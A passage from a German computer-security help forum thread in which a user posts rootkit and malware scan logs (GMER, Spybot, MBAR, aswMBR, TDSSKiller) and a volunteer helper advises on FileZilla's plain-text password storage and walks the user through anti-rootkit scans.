Error - 12.05.2013 17:01:37 | Computer Name = ***-Notebook | Source = ACPI | ID = 327690
Description = ACPI: ACPI-BIOS versucht, in einen ungültigen PCI-Operationsbereich
 (0x4) zu schreiben. Wenden Sie sich an den Systemhersteller, um technische Unterstützung
 zu erhalten.
 
Error - 12.05.2013 17:01:37 | Computer Name = ***-Notebook | Source = ACPI | ID = 327690
Description = ACPI: ACPI-BIOS versucht, in einen ungültigen PCI-Operationsbereich
 (0x10) zu schreiben. Wenden Sie sich an den Systemhersteller, um technische Unterstützung
 zu erhalten.
 
Error - 12.05.2013 17:01:37 | Computer Name = ***-Notebook | Source = ACPI | ID = 327690
Description = ACPI: ACPI-BIOS versucht, in einen ungültigen PCI-Operationsbereich
 (0x14) zu schreiben. Wenden Sie sich an den Systemhersteller, um technische Unterstützung
 zu erhalten.
 
Error - 12.05.2013 17:01:37 | Computer Name = ***-Notebook | Source = ACPI | ID = 327690
Description = ACPI: ACPI-BIOS versucht, in einen ungültigen PCI-Operationsbereich
 (0x1c) zu schreiben. Wenden Sie sich an den Systemhersteller, um technische Unterstützung
 zu erhalten.
 
Error - 12.05.2013 17:01:37 | Computer Name = ***-Notebook | Source = ACPI | ID = 327690
Description = ACPI: ACPI-BIOS versucht, in einen ungültigen PCI-Operationsbereich
 (0x24) zu schreiben. Wenden Sie sich an den Systemhersteller, um technische Unterstützung
 zu erhalten.
 
Error - 15.05.2013 04:09:52 | Computer Name = ***-Notebook | Source = Disk | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.
 
Error - 15.05.2013 05:45:53 | Computer Name = ***-Notebook | Source = Disk | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR2 gefunden.
 
Error - 15.05.2013 07:27:24 | Computer Name = ***-Notebook | Source = Disk | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR3 gefunden.
 
Error - 15.05.2013 10:47:06 | Computer Name = ***-Notebook | Source = EventLog | ID = 6008
Description = Das System wurde zuvor am ?15.?05.?2013 um 13:27:32 unerwartet heruntergefahren.
 
 
< End of report >

--- --- ---

gmer.txt:
GMER Logfile:

Code:

ATTFilter

GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2013-05-18 15:20:23
Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 Corsair_ rev.2.2_ 119,24GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\***~1\AppData\Local\Temp\pxtorpoc.sys


---- System - GMER 2.1 ----

SSDT            805FE666                                                       ZwCreateSection
SSDT            805FE670                                                       ZwRequestWaitReplyPort
SSDT            805FE66B                                                       ZwSetContextThread
SSDT            805FE675                                                       ZwSetSecurityObject
SSDT            805FE67A                                                       ZwSystemDebugControl
SSDT            805FE607                                                       ZwTerminateProcess
SSDT            \SystemRoot\system32\ntkrnlpa.exe                              ZwCreateKey [0x8244DFE2]
SSDT            \SystemRoot\system32\ntkrnlpa.exe[unknown section] [8244DFE2]  ZwCreateKey [0x8244DFE2]
SSDT            \SystemRoot\system32\ntkrnlpa.exe                              ZwOpenKey [0x8244DFE7]
SSDT            \SystemRoot\system32\ntkrnlpa.exe[unknown section] [8244DFE7]  ZwOpenKey [0x8244DFE7]

INT 0x03        \SystemRoot\system32\ntkrnlpa.exe[unknown section]             8244DFF6

---- Kernel code sections - GMER 2.1 ----

.text           ntkrnlpa.exe!ZwRollbackEnlistment + 140D                       8248AA09 1 Byte  [06]
.text           ntkrnlpa.exe!KiDispatchInterrupt + 5A2                         824C41F2 19 Bytes  [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}
.text           ntkrnlpa.exe!KeRemoveQueueEx + 11BF                            824CB314 3 Bytes  [E2, DF, 44] {LOOP 0xffffffe1; INC ESP}
.text           ntkrnlpa.exe!KeRemoveQueueEx + 11F7                            824CB34C 4 Bytes  [66, E6, 5F, 80]
.text           ntkrnlpa.exe!KeRemoveQueueEx + 137F                            824CB4D4 3 Bytes  [E7, DF, 44] {OUT 0xdf, EAX; INC ESP}
.text           ntkrnlpa.exe!KeRemoveQueueEx + 1553                            824CB6A8 4 Bytes  [70, E6, 5F, 80]
.text           ntkrnlpa.exe!KeRemoveQueueEx + 1597                            824CB6EC 4 Bytes  [6B, E6, 5F, 80]
.text           ...                                                            
.text           C:\Windows\system32\drivers\aksfridge.sys                      section is writeable [0xAD820000, 0x4ADDD, 0xE0000020]
.init           C:\Windows\system32\drivers\aksfridge.sys                      entry point in ".init" section [0xAD878224]
.init           C:\Windows\system32\drivers\aksfridge.sys                      unknown last code section [0xAD878000, 0x4000, 0xE20000E0]
.text           C:\Windows\system32\drivers\hardlock.sys                       section is writeable [0xAD87C400, 0x6F928, 0xE8000020]
.init           C:\Windows\system32\drivers\hardlock.sys                       entry point in ".init" section [0xAD8FFA24]
.init           C:\Windows\system32\drivers\hardlock.sys                       unknown last code section [0xAD8FF800, 0xEA00, 0xE20000E0]

---- Devices - GMER 2.1 ----

AttachedDevice  \Driver\kbdclass \Device\KeyboardClass0                        Wdf01000.sys
AttachedDevice  \Driver\kbdclass \Device\KeyboardClass1                        Wdf01000.sys

Device          \Driver\partmgr \Device\PartmgrControl                         aksfridge.sys

AttachedDevice  \FileSystem\fastfat \Fat                                       fltmgr.sys

---- EOF - GMER 2.1 ----

--- --- ---

EDIT: Ach ja, heute hat Avira sich geweigert geöffnet zu werden, nach nem Neustart wars aber wieder weg:

Danke fürs durchlesen und eure Hilfe!
Lg,
MA2413

cosinus · 24.05.2013, 18:44

Hallo,

ich sehe du verwendest offensichtlich FileZilla um die Daten auf deine HP hochzuladen, ist das richtig? Wenn ja, hast du die Logindaten inkl. Passwort dazu in FileZilla gespeichert?

MA2413 · 24.05.2013, 19:48

Hallo cosinus,
Explizit gespeichert hab ich die Login-Daten nicht, aber File-Zilla speichert die offenbar automatisch, ich hab mich immer wieder neuverbinden können, ohne die Login-Daten erneut einzugeben.

cosinus · 24.05.2013, 20:06

Das scheint gerade bei FileZilla ein Problem zu sein. Der speichert die Logindaten und somit auch die Passwörter wenn man es denn angewiesen hat lokal in einer XML-Datei...und zwar im Klartext. Naja, eigentlich sollte man Passwörter niemals speichern, jedenfalls nicht über diesen Mechanismus.

Ändere erstmal das Passwort von deinem FTP-Zugang, verwende nach Möglichkeit kein unverschlüsseltes FTP mehr und speichere deine Passwörter nicht mehr in Filezilla. Nimm stattdessen einen Passwort-Manager wie zB KeePass, der alle Passwörter in einer verschlüsselten Tresordatei ablegt.

Hast du eigentlich noch weitere Logs (mit Funden)? Malwarebytes und/oder andere Virenscanner, sind die jemals fündig geworden?

Ich frage deswegen nach => http://www.trojaner-board.de/125889-...tml#post941520

Bitte keine neuen Virenscans machen sondern erst nur schon vorhandene Logs posten!

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

MA2413 · 24.05.2013, 21:47

Danke für den Hinweise bezügl. FileZilla!

Avira hat seit dem Besuchen der Homepage nichts mehr gefunden, habe gerade noch eine vollständige Systemüberprüfung gemacht, nichts.

Ich habe vor ein paar Tagen noch Spybot Search and Destroy 2 drüberlaufen lassen, der hat ein paar Sachen gefunden, die er dann behoben hat:

Code:

ATTFilter

Search results from Spybot - Search & Destroy

22.05.2013 14:02:59
Scan took 00:11:27.
35 items found.

Macromedia.FlashPlayer.Cookies: [SBI $6AA61750]  Text file (File, nothing done)
  C:\Users\***\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\23TLEYJ9\s.ytimg.com\soundData.sol
  Properties.size=49
  Properties.md5=D1B2E67C79EBCBCA1FE7226ECB19DAF0
  Properties.filedate=1369131727
  Properties.filedatetext=2013-05-21 12:22:07

Macromedia.FlashPlayer.Cookies: [SBI $6AA61750]  Text file (File, nothing done)
  C:\Users\***\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\23TLEYJ9\s.ytimg.com\videostats.sol
  Properties.size=275
  Properties.md5=59AFCB78FEE38E3C220A31AEA6012BE0
  Properties.filedate=1369131928
  Properties.filedatetext=2013-05-21 12:25:27

Macromedia.FlashPlayer.Cookies: [SBI $6AA61750]  Text file (File, nothing done)
  C:\Users\***\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\23TLEYJ9\watchfreeinhd.com\com.jeroenwijering.sol
  Properties.size=54
  Properties.md5=2ECF99639CB737742182F41D5AE9C3F2
  Properties.filedate=1368894378
  Properties.filedatetext=2013-05-18 18:26:18

Log: [SBI $8E73A7FB]  Activity: ntbtlog.txt (File, nothing done)
  C:\Windows\ntbtlog.txt
  Properties.size=116810
  Properties.md5=AF42BDC8967F4BD6F6C9210F0560D81F
  Properties.filedate=1369223603
  Properties.filedatetext=2013-05-22 13:53:23

Log: [SBI $8E73A7FB]  Install: setupact.log (File, nothing done)
  C:\Windows\setupact.log
  Properties.size=1189
  Properties.md5=926384BB77E79F817CBFB70E4621F6BF
  Properties.filedate=1369223180
  Properties.filedatetext=2013-05-22 13:46:19

Log: [SBI $8E73A7FB]  Shutdown: System32\wbem\logs\wmiprov.log (File, nothing done)
  C:\Windows\System32\wbem\logs\wmiprov.log
  Properties.size=471
  Properties.md5=A1A19527735801AE129B696495A00B40
  Properties.filedate=1369223325
  Properties.filedatetext=2013-05-22 13:48:44

Internet Explorer: [SBI $1E8157BE] Typed URL list (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Internet Explorer\TypedURLs

Internet Explorer: [SBI $0BC7B918] User agent (Registry Change, nothing done)
  HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

Internet Explorer: [SBI $0BC7B918] User agent (Registry Change, nothing done)
  HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

Internet Explorer: [SBI $0BC7B918] User agent (Registry Change, nothing done)
  HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

Internet Explorer: [SBI $0BC7B918] User agent (Registry Change, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

Internet Explorer: [SBI $0BC7B918] User agent (Registry Change, nothing done)
  HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

MS Direct3D: [SBI $C2A44980] Most recent application (Registry Change, nothing done)
  HKEY_USERS\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication\Name

MS Direct3D: [SBI $C2A44980] Most recent application (Registry Change, nothing done)
  HKEY_USERS\S-1-5-20\Software\Microsoft\Direct3D\MostRecentApplication\Name

MS Direct3D: [SBI $C2A44980] Most recent application (Registry Change, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Direct3D\MostRecentApplication\Name

MS Direct3D: [SBI $C2A44980] Most recent application (Registry Change, nothing done)
  HKEY_USERS\S-1-5-18\Software\Microsoft\Direct3D\MostRecentApplication\Name

MS DirectDraw: [SBI $EB49D5AF] Most recent application (Registry Change, nothing done)
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name

MS Paint: [SBI $07867C39] Recent file list (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List

Windows: [SBI $1E4E2003] Drivers installation paths (Registry Change, nothing done)
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Installation Sources

Windows.OpenWith: [SBI $F7204896] Open with list - .AVI extension (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.AVI\OpenWithList

Windows.OpenWith: [SBI $A1C94E79] Open with list - .BMP extension (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.BMP\OpenWithList

Windows.OpenWith: [SBI $99432203] Open with list - .CFG extension (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.CFG\OpenWithList

Windows Explorer: [SBI $AA0766B5] Stream history (Registry Key, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU

Windows Media SDK: [SBI $37AAEDE6] Computer name (Registry Change, nothing done)
  HKEY_USERS\S-1-5-20\Software\Microsoft\Windows Media\WMSDK\General\ComputerName

Windows Media SDK: [SBI $37AAEDE6] Computer name (Registry Change, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows Media\WMSDK\General\ComputerName

Windows Media SDK: [SBI $CAA58B6E] Unique ID (Registry Change, nothing done)
  HKEY_USERS\S-1-5-20\Software\Microsoft\Windows Media\WMSDK\General\UniqueID

Windows Media SDK: [SBI $CAA58B6E] Unique ID (Registry Change, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows Media\WMSDK\General\UniqueID

Windows Media SDK: [SBI $BACCD0DA] Volume serial number (Registry Value, nothing done)
  HKEY_USERS\S-1-5-20\Software\Microsoft\Windows Media\WMSDK\General\VolumeSerialNumber

Windows Media SDK: [SBI $BACCD0DA] Volume serial number (Registry Value, nothing done)
  HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\Software\Microsoft\Windows Media\WMSDK\General\VolumeSerialNumber

Cookie: [SBI $49804B54] Browser: Cookie (6) (Browser: Cookie, nothing done)
  

Cache: [SBI $49804B54] Browser: Cache (71) (Browser: Cache, nothing done)
  

Verlauf: [SBI $49804B54] Browser: History (104) (Browser: History, nothing done)
  

Cookie: [SBI $49804B54] Browser: Cookie (1) (Browser: Cookie, nothing done)
  

Verlauf: [SBI $49804B54] Browser: History (274) (Browser: History, nothing done)
  

Cookie: [SBI $49804B54] Browser: Cookie (21) (Browser: Cookie, nothing done)
  


--- Spybot - Search & Destroy version: 2.0.12.131  DLL (build: 20121113) ---

2012-11-13 blindman.exe (2.0.12.151)
2012-11-13 explorer.exe (2.0.12.173)
2012-11-13 SDBootCD.exe (2.0.12.109)
2012-11-13 SDCleaner.exe (2.0.12.110)
2012-11-13 SDDelFile.exe (2.0.12.94)
2012-11-13 SDFiles.exe (2.0.12.135)
2012-11-13 SDFileScanHelper.exe (2.0.12.1)
2012-11-13 SDFSSvc.exe (2.0.12.205)
2012-11-13 SDImmunize.exe (2.0.12.130)
2012-11-13 SDLogReport.exe (2.0.12.107)
2012-11-13 SDPESetup.exe (2.0.12.3)
2012-11-13 SDPEStart.exe (2.0.12.86)
2012-11-13 SDPhoneScan.exe (2.0.12.27)
2012-11-13 SDPRE.exe (2.0.12.13)
2012-11-13 SDPrepPos.exe (2.0.12.10)
2012-11-13 SDQuarantine.exe (2.0.12.103)
2012-11-13 SDRootAlyzer.exe (2.0.12.116)
2012-11-13 SDSBIEdit.exe (2.0.12.39)
2012-11-13 SDScan.exe (2.0.12.173)
2012-11-13 SDScript.exe (2.0.12.53)
2012-11-13 SDSettings.exe (2.0.12.130)
2012-11-13 SDShred.exe (2.0.12.105)
2012-11-13 SDSysRepair.exe (2.0.12.101)
2012-11-13 SDTools.exe (2.0.12.150)
2012-11-13 SDTray.exe (2.0.12.127)
2012-11-13 SDUpdate.exe (2.0.12.89)
2012-11-13 SDUpdSvc.exe (2.0.12.76)
2012-11-13 SDWelcome.exe (2.0.12.126)
2012-11-13 SDWSCSvc.exe (2.0.12.2)
2013-05-21 unins000.exe (51.1052.0.0)
1999-12-02 xcacls.exe
2012-08-23 borlndmm.dll (10.0.2288.42451)
2012-09-05 DelZip190.dll (1.9.0.107)
2012-09-10 libeay32.dll (1.0.0.4)
2012-09-10 libssl32.dll (1.0.0.4)
2012-11-13 SDAdvancedCheckLibrary.dll (2.0.12.98)
2012-11-13 SDECon32.dll (2.0.12.113)
2012-11-13 SDEvents.dll (2.0.12.2)
2012-11-13 SDFileScanLibrary.dll (2.0.12.9)
2012-11-13 SDHelper.dll (2.0.12.88)
2012-11-13 SDImmunizeLibrary.dll (2.0.12.2)
2012-11-13 SDLists.dll (2.0.12.4)
2012-11-13 SDResources.dll (2.0.12.7)
2012-11-13 SDScanLibrary.dll (2.0.12.131)
2012-11-13 SDTasks.dll (2.0.12.15)
2012-11-13 SDWinLogon.dll (2.0.12.0)
2012-08-23 sqlite3.dll
2012-09-10 ssleay32.dll (1.0.0.4)
2012-11-13 Tools.dll (2.0.12.36)
2012-11-13 UninsSrv.dll (2.0.12.52)
2012-12-18 Includes\Adware.sbi (*)
2013-05-08 Includes\AdwareC.sbi (*)
2010-08-13 Includes\Cookies.sbi (*)
2012-11-14 Includes\Dialer.sbi (*)
2012-11-14 Includes\DialerC.sbi (*)
2012-11-14 Includes\HeavyDuty.sbi (*)
2012-11-14 Includes\Hijackers.sbi (*)
2012-11-14 Includes\HijackersC.sbi (*)
2012-11-14 Includes\iPhone.sbi (*)
2012-11-14 Includes\Keyloggers.sbi (*)
2012-12-18 Includes\KeyloggersC.sbi (*)
2012-11-21 Includes\Malware.sbi (*)
2013-05-15 Includes\MalwareC.sbi (*)
2012-11-14 Includes\PUPS.sbi (*)
2013-05-15 Includes\PUPSC.sbi (*)
2012-11-14 Includes\Security.sbi (*)
2012-11-14 Includes\SecurityC.sbi (*)
2008-06-03 Includes\Spybots.sbi (*)
2008-06-03 Includes\SpybotsC.sbi (*)
2013-04-09 Includes\Spyware.sbi (*)
2013-05-08 Includes\SpywareC.sbi (*)
2011-06-07 Includes\Tracks.sbi (*)
2012-11-19 Includes\Tracks.uti (*)
2013-01-16 Includes\Trojans.sbi (*)
2013-05-13 Includes\TrojansC-02.sbi (*)
2013-05-15 Includes\TrojansC-03.sbi (*)
2013-03-14 Includes\TrojansC-04.sbi (*)
2013-05-08 Includes\TrojansC-05.sbi (*)
2013-04-19 Includes\TrojansC.sbi (*)

cosinus · 24.05.2013, 22:11

Bevor wir uns an die Arbeit machen, möchte ich dich bitten, folgende Punkte vollständig und aufmerksam zu lesen.

Lies dir meine Anleitungen, die ich im Laufe dieses Strangs hier posten werde, aufmerksam durch. Frag umgehend nach, wenn dir irgendetwas unklar sein sollte, bevor du anfängst meine Anleitungen umzusetzen.
Solltest du bei einem Schritt Probleme haben, stoppe dort und beschreib mir das Problem so gut du kannst. Manchmal erfordert ein Schritt den vorhergehenden.
Bitte nur Scans durchführen zu denen du von einem Helfer aufgefordert wurdest! Installiere / Deinstalliere keine Software ohne Aufforderung!
Poste die Logfiles direkt in deinen Thread (bitte in CODE-Tags) und nicht als Anhang, ausser du wurdest dazu aufgefordert. Logs in Anhängen erschweren mir das Auswerten!
Die Logs der aufgegebenen Tools wie zB Malwarebytes sind immer zu posten - egal ob ein Fund dabei war oder nicht!
Beachte bitte auch => Löschen von Logfiles und andere Anfragen

Note:
Sollte ich drei Tage nichts von mir hören lassen, so melde dich bitte in diesem Strang => Erinnerung an meinem Thread.
Nervige "Wann geht es weiter" Nachrichten enden mit Schließung deines Themas. Auch ich habe ein Leben abseits des Trojaner-Boards.

Bitte die drei Tools MBAR / aswMBR / TDSSkiller nun ausführen und die Logs in CODE-Tags posten

MBAR (Malwarebytes Anti-Rootkit)

Downloade dir bitte

Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.

Starte bitte die mbar.exe.
Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
Klicke auf den CleanUp Button und erlaube den Neustart.
Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
Nach dem Neustart starte die mbar.exe erneut.
Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers

aswMBR

Downloade dir bitte

aswMBR.exe und speichere die Datei auf deinem Desktop.

Starte die aswMBR.exe - (aswMBR.exe Anleitung)
Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten".
Das Tool wird dich fragen, ob Du mit der aktuellen Virendefinition von AVAST! dein System scannen willst. Beantworte diese Frage bitte mit Ja. (Sollte deine Firewall fragen, bitte den Zugriff auf das Internet zulassen )
Der Download der Definitionen kann je nach Verbindung eine Weile dauern.
Klicke auf Scan.
Warte bitte bis Scan finished successfully im DOS-Fenster steht.
Drücke auf Save Log und speichere diese auf dem Desktop.

Poste mir die aswMBR.txt in deiner nächsten Antwort.

Wichtig: Drücke keinesfalls einen der Fix Buttons ohne Anweisung

Hinweis: Sollte der Scan Button ausgeblendet sein, schließe das Tool und starte es erneut. Sollte der Scan abbrechen und das Programm abstürzen, dann teile mir das mit und wähle unter AV Scan die Einstellung (none).

TDSS-Killer

Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

MA2413 · 24.05.2013, 22:42

Hier die Log-Files, aswMBR ist abestürzt (Programm reagiert nicht mehr), dann erneuten Scan mit "none" durchgeführt.

Code:

ATTFilter

Malwarebytes Anti-Rootkit BETA 1.05.0.1001
www.malwarebytes.org

Database version: v2013.05.24.08

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 10.0.9200.16540
*** :: *** [administrator]

24.05.2013 23:22:50
mbar-log-2013-05-24 (23-22-50).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM | P2P
Scan options disabled: 
Objects scanned: 234217
Time elapsed: 4 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

aswMBR ist abestürzt (Programm reagiert nicht mehr), dann erneuten mit "none" Scan durchgeführt.

Code:

ATTFilter

aswMBR version 0.9.9.1771 Copyright(c) 2011 AVAST Software
Run date: 2013-05-24 23:33:08
-----------------------------
23:33:08.144    OS Version: Windows 6.1.7601 Service Pack 1
23:33:08.144    Number of processors: 4 586 0x2505
23:33:08.144    ComputerName: ***  UserName: ***
23:33:08.362    Initialize success
23:33:17.441    AVAST engine defs: 13052400
23:33:26.489    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1
23:33:26.505    Disk 0 Vendor: Corsair_ 2.2_ Size: 122104MB BusType: 3
23:33:26.536    Disk 0 MBR read successfully
23:33:26.536    Disk 0 MBR scan
23:33:26.552    Disk 0 Windows 7 default MBR code
23:33:26.552    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS       102400 MB offset 206848
23:33:26.567    Disk 0 scanning sectors +209923360
23:33:26.614    Disk 0 scanning C:\Windows\system32\drivers
23:33:33.385    Service scanning
23:33:44.351    Modules scanning
23:33:47.253    Disk 0 trace - called modules:
23:33:47.269    ntkrnlpa.exe CLASSPNP.SYS disk.sys iaStor.sys halmacpi.dll 
23:33:47.269    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x87795648]
23:33:47.783    3 CLASSPNP.SYS[8a9ab59e] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-1[0x8583b028]
23:33:47.783    Scan finished successfully
23:33:56.566    Disk 0 MBR has been saved successfully to "C:\Users\***\Desktop\MBR.dat"
23:33:56.582    The log file has been saved successfully to "C:\Users\***\Desktop\aswMBR.txt"

Code:

ATTFilter

 23:35:10.0930 3476  TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
23:35:11.0039 3476  ============================================================
23:35:11.0039 3476  Current date / time: 2013/05/24 23:35:11.0039
23:35:11.0039 3476  SystemInfo:
23:35:11.0039 3476  
23:35:11.0039 3476  OS Version: 6.1.7601 ServicePack: 1.0
23:35:11.0039 3476  Product type: Workstation
23:35:11.0039 3476  ComputerName: ***
23:35:11.0039 3476  UserName: ***
23:35:11.0039 3476  Windows directory: C:\Windows
23:35:11.0039 3476  System windows directory: C:\Windows
23:35:11.0039 3476  Processor architecture: Intel x86
23:35:11.0039 3476  Number of processors: 4
23:35:11.0039 3476  Page size: 0x1000
23:35:11.0039 3476  Boot type: Normal boot
23:35:11.0039 3476  ============================================================
23:35:11.0382 3476  Drive \Device\Harddisk0\DR0 - Size: 0x1DCF856000 (119.24 Gb), SectorSize: 0x200, Cylinders: 0x3CCE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
23:35:11.0382 3476  ============================================================
23:35:11.0382 3476  \Device\Harddisk0\DR0:
23:35:11.0382 3476  MBR partitions:
23:35:11.0382 3476  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0xC800520
23:35:11.0382 3476  ============================================================
23:35:11.0382 3476  C: <-> \Device\Harddisk0\DR0\Partition1
23:35:11.0382 3476  ============================================================
23:35:11.0382 3476  Initialize success
23:35:11.0382 3476  ============================================================
23:35:38.0537 5440  ============================================================
23:35:38.0537 5440  Scan started
23:35:38.0537 5440  Mode: Manual; SigCheck; TDLFS; 
23:35:38.0537 5440  ============================================================
23:35:38.0631 5440  ================ Scan system memory ========================
23:35:38.0631 5440  System memory - ok
23:35:38.0631 5440  ================ Scan services =============================
23:35:38.0662 5440  [ 1B133875B8AA8AC48969BD3458AFE9F5 ] 1394ohci        C:\Windows\system32\drivers\1394ohci.sys
23:35:38.0724 5440  1394ohci - ok
23:35:38.0724 5440  [ CEA80C80BED809AA0DA6FEBC04733349 ] ACPI            C:\Windows\system32\drivers\ACPI.sys
23:35:38.0740 5440  ACPI - ok
23:35:38.0740 5440  [ 1EFBC664ABFF416D1D07DB115DCB264F ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
23:35:38.0771 5440  AcpiPmi - ok
23:35:38.0771 5440  [ 3927397AC60D943DAF8808AFFED582B7 ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
23:35:38.0787 5440  AdobeARMservice - ok
23:35:38.0802 5440  [ 21E785EBD7DC90A06391141AAC7892FB ] adp94xx         C:\Windows\system32\DRIVERS\adp94xx.sys
23:35:38.0818 5440  adp94xx - ok
23:35:38.0818 5440  [ 0C676BC278D5B59FF5ABD57BBE9123F2 ] adpahci         C:\Windows\system32\DRIVERS\adpahci.sys
23:35:38.0834 5440  adpahci - ok
23:35:38.0834 5440  [ 7C7B5EE4B7B822EC85321FE23A27DB33 ] adpu320         C:\Windows\system32\DRIVERS\adpu320.sys
23:35:38.0849 5440  adpu320 - ok
23:35:38.0865 5440  [ 8B5EEFEEC1E6D1A72A06C526628AD161 ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
23:35:38.0912 5440  AeLookupSvc - ok
23:35:38.0912 5440  [ 9EBBBA55060F786F0FCAA3893BFA2806 ] AFD             C:\Windows\system32\drivers\afd.sys
23:35:38.0943 5440  AFD - ok
23:35:38.0943 5440  [ 507812C3054C21CEF746B6EE3D04DD6E ] agp440          C:\Windows\system32\drivers\agp440.sys
23:35:38.0958 5440  agp440 - ok
23:35:38.0958 5440  [ 8B30250D573A8F6B4BD23195160D8707 ] aic78xx         C:\Windows\system32\DRIVERS\djsvs.sys
23:35:38.0974 5440  aic78xx - ok
23:35:38.0974 5440  [ C6397472A8788505FB23C85441837978 ] aksfridge       C:\Windows\system32\drivers\aksfridge.sys
23:35:39.0005 5440  aksfridge - ok
23:35:39.0005 5440  [ 18A54E132947CD98FEA9ACCC57F98F13 ] ALG             C:\Windows\System32\alg.exe
23:35:39.0021 5440  ALG - ok
23:35:39.0021 5440  [ 0D40BCF52EA90FC7DF2AEAB6503DEA44 ] aliide          C:\Windows\system32\drivers\aliide.sys
23:35:39.0036 5440  aliide - ok
23:35:39.0036 5440  [ 3C6600A0696E90A463771C7422E23AB5 ] amdagp          C:\Windows\system32\drivers\amdagp.sys
23:35:39.0052 5440  amdagp - ok
23:35:39.0052 5440  [ CD5914170297126B6266860198D1D4F0 ] amdide          C:\Windows\system32\drivers\amdide.sys
